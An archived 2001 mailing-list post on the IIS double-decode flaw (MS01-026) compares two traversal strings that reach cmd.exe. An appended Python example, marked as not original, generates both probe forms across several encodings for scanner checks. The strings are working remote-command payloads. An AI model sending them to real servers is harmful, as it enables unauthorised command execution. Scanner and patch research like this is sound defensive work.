Vulnerability Development mailing list archives
double decode: to slash or not to slash.
From: Roelof <roelof () sensepost com>
Date: Wed, 4 Jul 2001 13:43:21 +0200 (SAST)
Hi all.

Strange thing with the double decode problem on IIS. Refer: http://www.microsoft.com/technet/security/bulletin/MS01-026.asp

Most scanners (including the Nessus plugin) check for the problem using the following string:

/directory/..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir

Replace directory with an executable directory, and replace %255c with any combination of the double encoded string. It seems to work fine (I have seen this as the only vulnerability on a box and the scanner picks it up nicely).

However... I have found two boxes (one IISv4 and one IISv5) where it does not work. The weird thing is this - the following string:

/directory/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir

DOES work. The only difference is the ../ in front of /winnt/system32/blah.

A note - if you are using a scanner that only checks for the first string - please update - your site might be vulnerable. Arirang scanner does this check properly.

Why is this so? Are there two different problems here? Any comments?

Regards,
Roelof.
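The following is an added example, not code from Roelof's post or from any of the scanners he mentions. It builds both request forms from the post (with and without the extra "../" before winnt) for several double-encoded separators, and models the MS01-026 bug as a second percent-decode of an already-decoded path, so that the difference between a single-decode server and a double-decode server is visible. The list of separator spellings, the "scripts" directory used in the usage block, and the path-resolution model (treat "\" like "/" and collapse ".." with posixpath.normpath) are assumptions made for illustration, not IIS's actual canonicalisation algorithm.

```python
import posixpath
import urllib.parse

# Double-encoded separator spellings for the check (assumed list for this
# example; "%255c" is the one from the post). Each becomes "%5c" or "%2f"
# after one percent-decode and "\" or "/" after a second one.
DOUBLE_ENCODED_SEPARATORS = ["%255c", "%%35c", "%%35%63", "%25%35%63", "%252f"]

WINDOWS_TARGET = "winnt/system32/cmd.exe"
COMMAND = "/c+dir"


def build_probes(directory, separator="%255c", depth=4):
    """Return (with_slash, without_slash): the request path most scanners send,
    which puts '../' between the encoded climb and winnt, and the variant from
    the post that omits it. `directory` is an executable virtual directory."""
    climb = (".." + separator) * depth
    with_slash = "/%s/%s../%s?%s" % (directory, climb, WINDOWS_TARGET, COMMAND)
    without_slash = "/%s/%s%s?%s" % (directory, climb, WINDOWS_TARGET, COMMAND)
    return with_slash, without_slash


def decode_path(request, passes):
    """Percent-decode the path part of `request` `passes` times. A correct
    server decodes once; the MS01-026 bug is modelled as decoding the already
    decoded string a second time. The query string is not decoded."""
    path, _, _query = request.partition("?")
    for _ in range(passes):
        path = urllib.parse.unquote(path)
    return path


def resolve(request, passes):
    """Model where the decoded path lands on disk: treat '\\' like '/' and
    collapse '..' components. This is a simplification for illustration,
    not IIS's real path handling."""
    decoded = decode_path(request, passes).replace("\\", "/")
    return posixpath.normpath(decoded)


def all_probes(directory):
    """Every (separator, form, request) a scanner should send: both forms
    from the post for each separator spelling, so a box that only answers
    the form without '../' is not missed."""
    probes = []
    for sep in DOUBLE_ENCODED_SEPARATORS:
        with_slash, without_slash = build_probes(directory, sep)
        probes.append((sep, "with ../", with_slash))
        probes.append((sep, "without ../", without_slash))
    return probes


if __name__ == "__main__":
    # "scripts" is an assumed executable directory for the demonstration.
    for sep, form, request in all_probes("scripts"):
        print(form.ljust(12), request)
        print("  one decode :", resolve(request, 1))
        print("  two decodes:", resolve(request, 2))
```

Under this model both forms resolve to the same file after two decodes, which is exactly why the observed difference between them is puzzling; a scanner that sends only the first form has no way to notice a box that answers only the second, so a check should send both.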
Current thread:
- double decode: to slash or not to slash. Roelof (Jul 04)
- Re: double decode: to slash or not to slash. H D Moore (Jul 04)
- Re: double decode: to slash or not to slash. warning3 (Jul 04)